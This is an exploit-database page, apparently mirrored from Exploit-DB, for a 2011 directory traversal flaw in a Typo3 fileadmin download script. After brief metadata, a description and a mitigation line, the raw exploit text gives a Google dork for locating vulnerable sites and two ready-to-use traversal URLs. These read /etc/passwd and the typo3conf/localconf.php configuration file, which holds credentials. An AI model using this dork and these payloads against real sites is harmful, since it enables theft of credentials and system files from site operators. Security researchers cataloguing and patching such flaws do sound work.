header-logo
Suggest Exploit
vendor:
Typo3
by:
Number 7
7.5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: Typo3
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: typo3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2011

Typo3 File Disclosure

An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. The application will then return the content of the requested file, which can be used to gain access to sensitive information.

Mitigation:

Ensure that the application is not vulnerable to directory traversal attacks by validating user input and restricting access to sensitive files.
Source

Exploit-DB raw data:

 ________________________________________________________________________________________
|                           _              _                                              |
| ||\\      || ||       || | \\          // |  ____      ________           __________    |
| || \\     || ||       || | |\\        //| | |     \   |  ______|         |_______/ /    |
| ||  \\    || ||       || | | \\      // | | |  _   \  | |                       / /     |
| ||   \\   || ||       || | |  \\    //  | | | |_)  |  | |______    /\`'__\     / /      |
| ||    \\  || ||       || | |   \\  //   | | |  _  <   |  ______|   \ \ \/     / /       |
| ||     \\ || ||_______|| | |    \\//    | | | |_)  |  | |______     \ \_\    / /        |
| ||      \\|| |_________| |_|     \/     |_| |_____/   |________|     \/_/   /_/         |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [Typo3 File Disclosure]
# Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"]
# Date: [29/09/2011]
# Author: [Number 7]
# Contact :spam[-]tn[.]cs[@]live[.]fr
# Software Link: [http://typo3.org/]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd

http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Made In Tunisia // Kairouan // Mansoura City :D

Navigation

Suggest Exploit

Services By CQR